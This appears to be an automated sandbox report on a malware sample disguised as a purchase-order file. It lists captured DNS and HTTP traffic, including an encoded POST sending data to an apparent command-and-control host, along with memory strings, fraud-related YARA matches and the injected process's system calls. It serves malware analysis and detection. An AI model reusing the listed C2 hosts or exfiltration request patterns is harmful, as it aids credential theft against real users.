                      Source: global trafficHTTP traffic detected: GET /7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                      Source: global trafficDNS traffic detected: DNS query: www.dojodigitize.shop
                      Source: global trafficDNS traffic detected: DNS query: www.17jkgl.com
                      Source: global trafficDNS traffic detected: DNS query: www.alvinsd.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.shipincheshi.today
                      Source: global trafficDNS traffic detected: DNS query: www.elinor.club
                      Source: unknownHTTP traffic detected: POST /yjgs/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateHost: www.17jkgl.comOrigin: http://www.17jkgl.comReferer: http://www.17jkgl.com/yjgs/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 200User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1Data Raw: 4c 52 57 3d 30 4e 4e 46 6c 62 32 45 62 2b 77 37 49 74 6d 45 6d 70 34 70 6c 50 59 7a 54 5a 4e 54 45 74 47 44 4e 68 4d 54 53 78 57 4e 6f 77 30 41 39 37 56 41 37 30 33 52 32 33 35 56 46 2b 48 4c 59 64 4c 54 6e 79 75 6c 77 71 67 33 73 53 74 42 5a 52 34 34 4e 41 44 70 79 4e 2f 4e 4b 36 50 54 7a 54 52 51 53 52 70 67 67 30 6f 4d 65 61 6e 65 51 79 38 56 36 79 36 39 6e 75 70 4b 45 34 64 6b 53 77 49 43 50 4f 72 71 65 34 34 4f 42 54 31 51 77 38 4a 4b 48 4c 6e 7a 54 75 54 53 47 4f 58 48 49 7a 2b 51 76 44 75 55 58 75 33 6e 41 51 51 6b 55 65 34 70 58 38 54 78 78 6e 51 42 4d 6a 6d 49 79 6f 34 5a 34 67 3d 3d Data Ascii: LRW=0NNFlb2Eb+w7ItmEmp4plPYzTZNTEtGDNhMTSxWNow0A97VA703R235VF+HLYdLTnyulwqg3sStBZR44NADpyN/NK6PTzTRQSRpgg0oMeaneQy8V6y69nupKE4dkSwICPOrqe44OBT1Qw8JKHLnzTuTSGOXHIz+QvDuUXu3nAQQkUe4pX8TxxnQBMjmIyo4Z4g==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Wed, 27 Nov 2024 15:43:19 GMTContent-Length: 0Connection: closeWAFRule: 5
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Wed, 27 Nov 2024 15:43:44 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeContent-Length: 0Content-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 15:58:24 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4794Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c 71 77 db 54 96 ff 7b f9 14 6f 4d c1 4e b1 2d db 49 1c 37 71 c2 1a c7 49 3c 24 76 6a 3b 2d 85 76 7d 64 e9 d9 56 23 4b aa f4 1c c7 2d 3d 07 76 67 a0 b3 db 52 3a b0 4c bb 0b cb 14 ce 01 0e ec b4 b3 33 bb c0 00 65 bf 4c 9d a6 7f ed 57 d8 fb 64 d9 96 a5 27 c7 b8 e0 c0 2a 27 89 f4 74 df 7d bf 7b df bd f7 dd fb 2c 39 f9 b7 ab f9 74 e9 dc 76 06 d5 49 43 5e 79 2a d9 fb 87 79 71 e5 29 04 47 b2 81 09 8f 84 3a af 1b 98 2c fb 76 4a 6b a1 84 cf ba 45 24 22 e3 95 47 7f f9 f6 d1 b7 1f 76 6e de 7a f4 ee 87 8f df bd 73 78 ff 7e 92 eb de b1 31 50 f8 06 5e f6 e9 6a 45 25 86 0f 09 aa 42 b0 02 ec 14 55 52 44 bc 1f 54 d4 aa 2a cb 6a cb 87 38 ab 97 41 da 3d 0e f4 e0 4e a2 17 78 03 a3 93 5c bf a9 a2 8a 6d 74 a5 7f 49 0f 41 95 55 7d 11 3d 3d 3b 3b bb 34 74 a3 0a 03 2e a2 68 5c db 47 67 b0 2e f2 0a 1f 44 be 0d 2c ef 61 22 09 3c ca e1 26 f6 05 51 bd d7 10 44 29 5d e2 e5 20 f2 6f 49 82 ae 1a 6a 95 a0 73 fc 06 96 fc 41 64 f0 8a 11 32 b0 2e 55 87 87 68 f0 7a 4d 52 16 51 64 b8 59 e3 45 51 52 6a d0 8e 62 11 18 9e fe 19 50 5c ed 9f d5 a3 57 98 ec a2 b4 53 c4 c9 95 ca 13 32 a4 cb 78 11 c5 12 76 86 fd 9b 2d 2c d5 ea 20 f3 7c c4 d1 55 96 14 1c aa 5b 77 67 63 1e 68 62 6c c5 ce c5 12 09 01 8f 18 6e ce 39 5c 5f 7e aa fb 08 5b 65 f1 23 44 8c ba 44 ac a8 ba 88 f5 10 58 13 51 1b 40 00 0c 0c 55 96 44 f4 34 c6 98 29 d0 ac 87 7a 63 4c ed 59 e3 c6 47 aa b6 a2 ca 22 6b 2c be 52 d1 1d ea 6b ea 06 d5 1f 18 98 36 cc 90 e0 7d 12 12 b1 a0 ea 3c 91 54 00 d4 04 7f d0 e9 1c 8d a4 0b 99 ee b1 88 44 50 00 66 83 60 4f 60 22 4e 7f 96 98 e8 34 70 46 82 75 26 b7 c5 ba ba 87 1d 52 8d 83 7d c0 22 6c 1a 1e d6 75 d5 c1 a6 c2 0b bb 35 5d 85 ce 80 af 9a 10 2a 42 c5 de 7f c0 00 0b 75 15 11 be 22 63 87 db b7 24 91 d4 a9 ab 44 9e 19 d1 53 d3 9d fd fa b6 e9 9e 68 2a 6d 15 02 d2 22 e2 9b 44 f5 b4 90 c4 fc 33 23 bc 2b 1a 9e 9b 5f f2 90 35 d4 9b 91 ea 02 fd 61 99 b7 2b 96 58 56 af f3 a2 d4 34 c0 79 99 d6 59 e5 1b 92 dc 5e 44 69 55 01 97 e0 0d 08 74 9b 52 05 77 e7 08 6d a9 8a 0a 91 6e 0b 2b b2 1a 04 9a a6 2e 61 3d 88 1a d0 6c 68 bc 80 8f d0 df ca 28 2d 7a 78 77 c4 69 0d f6 a0 9e d9 17 b0 66 22 cb 2a 55 d5 1e de c3 b8 7f 8b e5 ba 21 a2 6a 8b 9e d1 d4 d6 39 dc c0 86 c1 d7 b0 d7 d4 bb 02 40 4f f9 b6 a0 22 8a 22 73 26 7a f1 27 82 14 d5 e9 b1 c3 96 c0 0e d2 a6 11 b9 8d cf e2 0e 12 86 64 5c 25 fd 09 9f 1b 41 a8 d3 81 bc 29 d9 a6 e1 b6 8c 9e 45 f4 56 49 5f e7 fb 7b 87 0f ee 3f fe b7 df 3c fe f6 96 cf c3 3a 06 ba 16 54 d1 a1 68 70 22 1e 14 40 e5 60 44 34 5e 96 6a 60 22 02 1e 0e 3c f4 e8 fb 47 95 b9 d0 76 05 66 cd df 08 af 76 38 90 5b 9f f6 50 74 ea d4 a9 a3 4c cb 00 6d 09 38 e4 96 da be ea 8d 67 5d 23 42 e2 29 fa c3 0e 4f a1 fd 5e 80 1a 1f 29 75 61 f6 62 e8 f2 d4 23 b8 20 55 3e 92 11 3d 46 65 0f a2 64 68 32 0f 46 29 29 a6 c7 54 64 55 d8 75 4c 38 cc 36 33 c4 77
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 15:58:32 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: runas.exe, 00000012.00000002.2943817151.000000000550C000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.000000000387C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1805442128.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, STiokuWkiGFJ.exe, 00000009.00000002.1994696296.000000000274A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: nhClcdOjQwJ.exe, 00000013.00000002.2944930407.0000000005308000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elinor.club
                      Source: nhClcdOjQwJ.exe, 00000013.00000002.2944930407.0000000005308000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elinor.club/7plr/
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812739466.000000000607A000.00000004.00000020.00020000.00000000.sdmp, Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: runas.exe, 00000012.00000002.2943817151.000000000537A000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.00000000036EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033-f
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: runas.exe, 00000012.00000002.2941572830.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: runas.exe, 00000012.00000003.2247650450.0000000007486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: runas.exe, 00000012.00000002.2943817151.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2945609383.0000000007200000.00000004.00000800.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.0000000003558000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042CCB3 NtClose,8_2_0042CCB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2B60 NtClose,LdrInitializeThunk,8_2_015D2B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_015D2DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_015D2C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D35C0 NtCreateMutant,LdrInitializeThunk,8_2_015D35C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D4340 NtSetContextThread,8_2_015D4340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D4650 NtSuspendThread,8_2_015D4650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2BF0 NtAllocateVirtualMemory,8_2_015D2BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2BE0 NtQueryValueKey,8_2_015D2BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2B80 NtQueryInformationFile,8_2_015D2B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2BA0 NtEnumerateValueKey,8_2_015D2BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2AD0 NtReadFile,8_2_015D2AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2AF0 NtWriteFile,8_2_015D2AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2AB0 NtWaitForSingleObject,8_2_015D2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2D10 NtMapViewOfSection,8_2_015D2D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2D00 NtSetInformationFile,8_2_015D2D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2D30 NtUnmapViewOfSection,8_2_015D2D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2DD0 NtDelayExecution,8_2_015D2DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2DB0 NtEnumerateKey,8_2_015D2DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2C60 NtCreateKey,8_2_015D2C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2C00 NtQueryInformationProcess,8_2_015D2C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2CC0 NtQueryVirtualMemory,8_2_015D2CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2CF0 NtOpenProcess,8_2_015D2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2CA0 NtQueryInformationToken,8_2_015D2CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2F60 NtCreateProcessEx,8_2_015D2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2F30 NtCreateSection,8_2_015D2F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2FE0 NtCreateFile,8_2_015D2FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2F90 NtProtectVirtualMemory,8_2_015D2F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2FB0 NtResumeThread,8_2_015D2FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2FA0 NtQuerySection,8_2_015D2FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2E30 NtWriteVirtualMemory,8_2_015D2E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2EE0 NtQueueApcThread,8_2_015D2EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2E80 NtReadVirtualMemory,8_2_015D2E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2EA0 NtAdjustPrivilegesToken,8_2_015D2EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3010 NtOpenDirectoryObject,8_2_015D3010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3090 NtSetValueKey,8_2_015D3090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D39B0 NtGetContextThread,8_2_015D39B0
